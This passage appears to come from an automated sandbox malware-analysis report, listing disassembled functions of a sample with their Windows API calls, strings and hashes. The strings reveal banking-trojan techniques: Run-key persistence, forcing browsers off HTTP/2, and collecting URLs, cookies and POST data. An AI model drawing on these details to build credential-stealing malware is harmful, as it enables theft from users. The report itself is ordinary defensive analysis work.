                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$AllocFreeHeap
                                                                                                                                        • String ID: WININET.DLL$WININET.dll$ieapfltr$ieframe$ieui$inetcpl.cpl$mshtml$urlmon
                                                                                                                                        • API String ID: 356845663-1120705325
                                                                                                                                        • Opcode ID: 916015298f47e6e50ae8af7dba3ebaab02079597587dc97b581b0fe172080999
                                                                                                                                        • Instruction ID: ca1682b0159335f12826812a5f8f56bdd698c4172cc24a3c9f554f45dc59ea2d
                                                                                                                                        • Opcode Fuzzy Hash: 916015298f47e6e50ae8af7dba3ebaab02079597587dc97b581b0fe172080999
                                                                                                                                        • Instruction Fuzzy Hash: 2521E930E00214BBDB10AFE6DC82A5E7FA4EB04752F10047BE545D7192E7B85E498B6F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004488D0, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 79stringmemoryfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,?,?,\sols,\sols,00453424,?,?,%userprofile%\AppData\Local\,?,00000000), ref: 004488E7
                                                                                                                                        • lstrlenW.KERNEL32(\sols,?,00000000), ref: 004488F2
                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000000), ref: 004488FA
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0044890F
                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00448920
                                                                                                                                        • lstrcatW.KERNEL32(00000000,\sols), ref: 00448932
                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000), ref: 00448937
                                                                                                                                        • lstrcatW.KERNEL32(00000000,004683E0), ref: 00448943
                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 0044894B
                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000), ref: 00448950
                                                                                                                                        • lstrcatW.KERNEL32(00000000,004683E0), ref: 0044895C
                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000002), ref: 00448977
                                                                                                                                        • CopyFileW.KERNEL32(?,00000000,00000000,?,00000000), ref: 0044897F
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0044898D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                                                                                                                        • String ID: $4E$\sols
                                                                                                                                        • API String ID: 3635185113-1966809840
                                                                                                                                        • Opcode ID: f9a93604b8ec1506e4ea0ef6a4bfbc39eafb5425aba8af8e44b964757be6e838
                                                                                                                                        • Instruction ID: 5b2f8b9975361b616aaefe51ef3b87147a62ab65b103e5a39d5425cce89960de
                                                                                                                                        • Opcode Fuzzy Hash: f9a93604b8ec1506e4ea0ef6a4bfbc39eafb5425aba8af8e44b964757be6e838
                                                                                                                                        • Instruction Fuzzy Hash: 0021D132500205BFD3216F54DC88F7F7BACEF85B94F02062EF50592261EFA59809CA6B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00449D57, Relevance: 27.3, APIs: 3, Strings: 15, Instructions: 262memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,00000000,?,00000000,0044AF60,?,00000000), ref: 00449E06
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000008,?,?), ref: 00449FBF
                                                                                                                                        • lstrlen.KERNEL32(00000008,00000000), ref: 0044A011
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeaplstrlenmemcpy
                                                                                                                                        • String ID: chunked$Access-Control-Allow-Origin:$Cache-Control:$Content-Encoding:$Content-Length:$Content-Security-Policy-Report-Only:$Content-Security-Policy:$Content-Type:$Etag:$HTTP/1.1 404 Not Found$Last-Modified:$Transfer-Encoding:$X-Frame-Options$gzip$no-cache, no-store, must-revalidate
                                                                                                                                        • API String ID: 462153822-754885170
                                                                                                                                        • Opcode ID: f7d0ba1cb1f8b9709855d95727c4e6bab5941052da81a9960001eceac4c4b55f
                                                                                                                                        • Instruction ID: c0e101b5331b8389484e0a5161338325a5382335160549bfe0d4e3c8d3978ff5
                                                                                                                                        • Opcode Fuzzy Hash: f7d0ba1cb1f8b9709855d95727c4e6bab5941052da81a9960001eceac4c4b55f
                                                                                                                                        • Instruction Fuzzy Hash: FEA1A071A00201AFEB54DF66C885B9A7BA4BF04314B24419BFC45DB396EBB8EC44CF59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045A5EE, Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274memorythreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0045A665
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0045A684
                                                                                                                                        • GetLastError.KERNEL32 ref: 0045A941
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0045A951
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0045A962
                                                                                                                                        • RtlExitUserThread.NTDLL(?), ref: 0045A970
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocCriticalSectionVirtual$EnterErrorExitLastLeaveThreadUser
                                                                                                                                        • String ID: .lF$8hF$\lF$flF$ghF
                                                                                                                                        • API String ID: 2137648861-1764878820
                                                                                                                                        • Opcode ID: d92b2c85501a74ca9ebd406fa1d015784a8eb5a43ad9926213f955400ad4bbb5
                                                                                                                                        • Instruction ID: 60d62b0acc32bae356cf1994cfee13f2256323a0c4d7c1d27ff133e471a51bdd
                                                                                                                                        • Opcode Fuzzy Hash: d92b2c85501a74ca9ebd406fa1d015784a8eb5a43ad9926213f955400ad4bbb5
                                                                                                                                        • Instruction Fuzzy Hash: DBA140B0900709AFDB309F21CC44AAA77B9FF18305F104A2AF915D2262E774DC59CF5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044EB59, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 179synchronizationstringthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0044EB80
                                                                                                                                        • memcpy.NTDLL(?,?,00000010), ref: 0044EBA3
                                                                                                                                        • memset.NTDLL ref: 0044EBEF
                                                                                                                                        • lstrcpyn.KERNEL32(?,?,00000034), ref: 0044EC03
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044EC31
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044EC74
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044EC93
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000927C0), ref: 0044ECCD
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 0044ECDB
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044ED50
                                                                                                                                        • ReleaseMutex.KERNEL32(?), ref: 0044ED62
                                                                                                                                        • RtlExitUserThread.NTDLL(?), ref: 0044ED78
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                                                                                                                                        • String ID: HlF$RlF$plF
                                                                                                                                        • API String ID: 4037736292-771404280
                                                                                                                                        • Opcode ID: 4ede739e8c14ad0e5aeb22fd5a72cef2f888f49dde5f8d5e6d2f1f66196b8d8d
                                                                                                                                        • Instruction ID: cc692e899df3a708f9159096d1390eb9e5ab6a579862183f7e4076b121f03afd
                                                                                                                                        • Opcode Fuzzy Hash: 4ede739e8c14ad0e5aeb22fd5a72cef2f888f49dde5f8d5e6d2f1f66196b8d8d
                                                                                                                                        • Instruction Fuzzy Hash: F9616E71904701AFE7209F26DD48A1BB7E9BF84711F004E2EF596D2290E7B8E905CF5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044562B, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 174stringmemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(03BD9608,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 0044564E
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 0044565D
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 0044566A
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00445682
                                                                                                                                        • lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044568E
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 004456AA
                                                                                                                                        • wsprintfA.USER32 ref: 00445762
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 004457A7
                                                                                                                                        • InterlockedExchange.KERNEL32(0046E00C,00000000), ref: 004457C5
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00445808
                                                                                                                                          • Part of subcall function 00450C0C: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00450C35
                                                                                                                                          • Part of subcall function 00450C0C: memcpy.NTDLL(00000000,?,?), ref: 00450C48
                                                                                                                                          • Part of subcall function 00450C0C: RtlEnterCriticalSection.NTDLL(0046E268), ref: 00450C59
                                                                                                                                          • Part of subcall function 00450C0C: RtlLeaveCriticalSection.NTDLL(0046E268), ref: 00450C6E
                                                                                                                                          • Part of subcall function 00450C0C: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00450CA6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                                                                                                                        • String ID: Accept-Language: $Cookie: $Referer: $URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: $USER: %s
                                                                                                                                        • API String ID: 4198405257-1852062776
                                                                                                                                        • Opcode ID: c0492a5284246c44003488cdcee78a138d8525737d4f956a055c25c21949a01c
                                                                                                                                        • Instruction ID: c55d6f4265169cb76b1673b73e93d63ddf7ee83f6708fef313f770b21a552ed3
                                                                                                                                        • Opcode Fuzzy Hash: c0492a5284246c44003488cdcee78a138d8525737d4f956a055c25c21949a01c
                                                                                                                                        • Instruction Fuzzy Hash: 17519C71A00209EFDF109FA5DC84BAF7BA8EB04344F14453AF805E7252EBB89A55CB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045E99C, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 121processstringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 0045E9B1
                                                                                                                                          • Part of subcall function 00449C8C: lstrlen.KERNEL32(?,00000008,00000000,?,74B05520,00458DBF,?,?,00000000,004414AA,?,00000000,?,00464A70,?,00000001), ref: 00449C9B
                                                                                                                                          • Part of subcall function 00449C8C: mbstowcs.NTDLL ref: 00449CB7
                                                                                                                                        • lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045E9EA
                                                                                                                                        • wcstombs.NTDLL ref: 0045E9F4
                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045EA25
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,*<F), ref: 0045EA51
                                                                                                                                        • TerminateProcess.KERNEL32(?,000003E5), ref: 0045EA67
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 0045EA7B
                                                                                                                                        • GetLastError.KERNEL32 ref: 0045EA7F
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,00000001), ref: 0045EA9F
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0045EAAE
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0045EAB3
                                                                                                                                        • GetLastError.KERNEL32 ref: 0045EAB7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                                                                                                                        • String ID: *<F$D$cmd /C "%s> %s1"
                                                                                                                                        • API String ID: 2463014471-3239704061
                                                                                                                                        • Opcode ID: 314c715358cc86c809db05a86ad8b3abbb39e57cdf900bfecc24ef7d472581fc
                                                                                                                                        • Instruction ID: cc591039505e2b9a79f9066427cd57abcbdf9e810036a4356b655d87c1310454
                                                                                                                                        • Opcode Fuzzy Hash: 314c715358cc86c809db05a86ad8b3abbb39e57cdf900bfecc24ef7d472581fc
                                                                                                                                        • Instruction Fuzzy Hash: 39415F71900118FFEB11EFA5CD859EEBBBCFB08305F20446AF901B2211E6755F099B6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00441381, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 188memorystringthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00461E71: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00461EB6
                                                                                                                                          • Part of subcall function 00461E71: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00461ECE
                                                                                                                                          • Part of subcall function 00461E71: WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461F94
                                                                                                                                          • Part of subcall function 00461E71: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461FBD
                                                                                                                                          • Part of subcall function 00461E71: HeapFree.KERNEL32(00000000,004413AA,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461FCD
                                                                                                                                          • Part of subcall function 00461E71: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461FD6
                                                                                                                                        • lstrcmp.KERNEL32(?,?), ref: 004413F8
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00441424
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004414CA
                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 004414DB
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00464A70,?,00000001), ref: 00441518
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00464A70,?,00000001), ref: 0044152C
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0044153A
                                                                                                                                        • wsprintfA.USER32 ref: 0044154B
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 00441556
                                                                                                                                          • Part of subcall function 00447913: lstrlen.KERNEL32(?,00000000,00466A4C,74B05520,0045D37E,?,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 0044791D
                                                                                                                                          • Part of subcall function 00447913: lstrcpy.KERNEL32(00000000,?), ref: 00447941
                                                                                                                                          • Part of subcall function 00447913: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 00447948
                                                                                                                                          • Part of subcall function 00447913: lstrcat.KERNEL32(00000000,00000001), ref: 0044799F
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 00441570
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00441581
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0044158D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                                                                                                                        • String ID: 7gF$DLL load status: %u
                                                                                                                                        • API String ID: 773763258-916204935
                                                                                                                                        • Opcode ID: 08c891ebfc526e84645649360398c37a1d53445c6b0fb3645f4719555b3e039c
                                                                                                                                        • Instruction ID: 1748b7ae483a9930e2ce16c1c1f92f51e29ed1b2845d3c1b3ceb2a223398d11a
                                                                                                                                        • Opcode Fuzzy Hash: 08c891ebfc526e84645649360398c37a1d53445c6b0fb3645f4719555b3e039c
                                                                                                                                        • Instruction Fuzzy Hash: E0712471D00119EFDB11DFA5DC84AEEBBB5FF08340F04402AE505A7260EB74AA85DB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045051C, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 146registrystringfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 00450540
                                                                                                                                          • Part of subcall function 00444AED: RegCloseKey.ADVAPI32(?), ref: 00444B74
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 0045057B
                                                                                                                                        • lstrcpyW.KERNEL32(-00000002,?), ref: 004505DC
                                                                                                                                        • lstrcatW.KERNEL32(00000000,.exe), ref: 004505EA
                                                                                                                                        • lstrcpyW.KERNEL32(?), ref: 00450604
                                                                                                                                        • lstrcatW.KERNEL32(00000000,.dll), ref: 0045060C
                                                                                                                                          • Part of subcall function 004421BA: lstrlenW.KERNEL32(00001000,.dll,00000000,00000000,00462CFE,00000000,.dll,00000000,00001000,00000000,00000000,?), ref: 004421C8
                                                                                                                                          • Part of subcall function 004421BA: lstrlen.KERNEL32(DllRegisterServer), ref: 004421D6
                                                                                                                                          • Part of subcall function 004421BA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 004421EB
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 0045066A
                                                                                                                                          • Part of subcall function 00450CB4: lstrlenW.KERNEL32(?,00000000,00000000,74B05520,?,?,004424EC,?), ref: 00450CC0
                                                                                                                                          • Part of subcall function 00450CB4: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,004424EC,?), ref: 00450CE8
                                                                                                                                          • Part of subcall function 00450CB4: memset.NTDLL ref: 00450CFA
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 0045069F
                                                                                                                                        • GetLastError.KERNEL32 ref: 004506AA
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 004506C0
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 004506D2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                                                                                                                                        • String ID: .dll$.exe$Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                        • API String ID: 1430934453-2351516416
                                                                                                                                        • Opcode ID: d7d1602ef875e655a0d0c7ac9e63fe37ecdc8d17b826dade025dd8d9b23d8ce0
                                                                                                                                        • Instruction ID: 08d89b61e5a0d368ad29bdcb675fc7fa4adfb91809c39b7f11fef3f7e671e20c
                                                                                                                                        • Opcode Fuzzy Hash: d7d1602ef875e655a0d0c7ac9e63fe37ecdc8d17b826dade025dd8d9b23d8ce0
                                                                                                                                        • Instruction Fuzzy Hash: B641D479900219FBDB119BA1CD00EAF7BB9FF45305F10052AFC00A2162E7789A15DB9E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044533F, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • memset.NTDLL ref: 0044536D
                                                                                                                                        • StrChrA.SHLWAPI(?,0000000D), ref: 004453B3
                                                                                                                                        • StrChrA.SHLWAPI(?,0000000A), ref: 004453C0
                                                                                                                                        • StrChrA.SHLWAPI(?,0000007C), ref: 004453E7
                                                                                                                                        • StrTrimA.SHLWAPI(?,0046A48C), ref: 004453FC
                                                                                                                                        • StrChrA.SHLWAPI(?,0000003D), ref: 00445405
                                                                                                                                        • StrTrimA.SHLWAPI(00000001,0046A48C), ref: 0044541B
                                                                                                                                        • _strupr.NTDLL ref: 00445422
                                                                                                                                        • StrTrimA.SHLWAPI(?,?), ref: 0044542F
                                                                                                                                        • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00445477
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?), ref: 00445496
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                                                                                                                        • String ID: $;
                                                                                                                                        • API String ID: 4019332941-73438061
                                                                                                                                        • Opcode ID: 1e95fdf9a0d08671b53ba81f2d90788ddd52ad8c828a8302fee044afa83f6236
                                                                                                                                        • Instruction ID: 70e04a491bb3872518e0162f1e763664c1f7c1277c763c11a1b113fb281dbfb1
                                                                                                                                        • Opcode Fuzzy Hash: 1e95fdf9a0d08671b53ba81f2d90788ddd52ad8c828a8302fee044afa83f6236
                                                                                                                                        • Instruction Fuzzy Hash: C541E6716087059FEB11DF298C45B1BBBE8EF54701F04091EF8899B342EBB8D945CB6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044364F, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 134stringmemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(00000000,74B05520,?,00000000,?,?,?), ref: 00443668
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0044366E
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0044367E
                                                                                                                                        • lstrcpy.KERNEL32(00000000,?), ref: 00443698
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 004436B0
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 004436BE
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 0044370C
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00443730
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0044375E
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?), ref: 00443789
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 004437A0
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?), ref: 004437AD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                                                                                                                        • String ID: http
                                                                                                                                        • API String ID: 904523553-2541227442
                                                                                                                                        • Opcode ID: ca9e70d0c2b20667fbce941a6e31a98440e17db6cb646693b006299960a511ac
                                                                                                                                        • Instruction ID: 438136bc1a600b5d6e2d84541ac2f67f4ce94ea3de49c6a004b6bd04be55dd70
                                                                                                                                        • Opcode Fuzzy Hash: ca9e70d0c2b20667fbce941a6e31a98440e17db6cb646693b006299960a511ac
                                                                                                                                        • Instruction Fuzzy Hash: FF41B1B1A00209BFEF21DFA1CC84A9E7BB9FF08705F108426F51596261EB759E10DF28
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004581B0, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 004581CA
                                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 004581E0
                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 00458223
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,004667AE), ref: 00458239
                                                                                                                                        • memcpy.NTDLL(00000000,00000000,004667AC), ref: 0045824C
                                                                                                                                        • _wcsupr.NTDLL ref: 00458257
                                                                                                                                        • lstrlenW.KERNEL32(?,004667AC), ref: 00458290
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,004667AC), ref: 004582A5
                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 004582BB
                                                                                                                                        • lstrcatW.KERNEL32(00000000, --use-spdy=off --disable-http2), ref: 004582D9
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 004582E8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                                                                                                                        • String ID: --use-spdy=off --disable-http2$.hF
                                                                                                                                        • API String ID: 3868788785-1139348283
                                                                                                                                        • Opcode ID: 7ff44e486e1989a441d3eca23a76572693e0e2cd638d1c31d57cd11daf0242b8
                                                                                                                                        • Instruction ID: e0d168d5b2fe97d1a777554eabf64f1052c964e008a46362560d80c52565cd00
                                                                                                                                        • Opcode Fuzzy Hash: 7ff44e486e1989a441d3eca23a76572693e0e2cd638d1c31d57cd11daf0242b8
                                                                                                                                        • Instruction Fuzzy Hash: 0B313F32500704ABC3205FA4DC4492F7F69EB55722F15056FFD11E2292EFB89C49875E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045E83D, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 89memoryregistrystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlImageNtHeader.NTDLL(00000000), ref: 0045E84E
                                                                                                                                        • GetTempPathA.KERNEL32(00000000,00000000,?,?,004608E9,00000094,00000000,00000000), ref: 0045E866
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 0045E875
                                                                                                                                        • GetTempPathA.KERNEL32(00000001,00000000,?,?,004608E9,00000094,00000000,00000000), ref: 0045E888
                                                                                                                                        • GetTickCount.KERNEL32 ref: 0045E88C
                                                                                                                                        • wsprintfA.USER32 ref: 0045E89C
                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 0045E8D0
                                                                                                                                        • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 0045E8E8
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0045E8F2
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0045E90E
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0045E91C
                                                                                                                                        Strings
